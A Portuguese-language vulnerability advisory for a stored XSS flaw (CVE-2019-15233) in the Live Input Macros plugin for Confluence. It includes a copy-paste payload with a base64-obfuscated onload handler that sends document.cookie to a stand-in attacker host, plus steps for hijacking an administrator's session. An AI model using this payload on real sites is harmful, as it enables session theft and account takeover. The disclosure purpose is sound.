
(FAB-2019-00157) Vulnerabilidade descoberta por mim CVE-2019-15233
(FAB-2019-00157) Vulnerabilidade descoberta por mim CVE-2019-15233
Aviso: advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
Esta vulnerabilidade de segurança foi encontrada por Francesco Emanuel Bennici [email protected] da FABMation GmbH.
O Live Input Macros oferece aos usuários a possibilidade de adicionar caixas de seleção, botões de opção, listas suspensas e muito mais às suas páginas do Confluence e fazer alterações sem editar a página.
Um atacante pode executar código JavaScript no site do Confluence se um usuário adicionar o código malicioso.
Isso pode ser usado para roubar o cookie de sessão de um (ex.) Administrador (Sequestro de Sessão).
Copie este conteúdo:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
E crie um novo Elemento em uma Página do Confluence. Cole este texto nele e compartilhe a Página do Confluence com (ex.) um Administrador de Sistema e se ele acessar o Site, você pode sequestrar/ "Copiar" a sessão dele.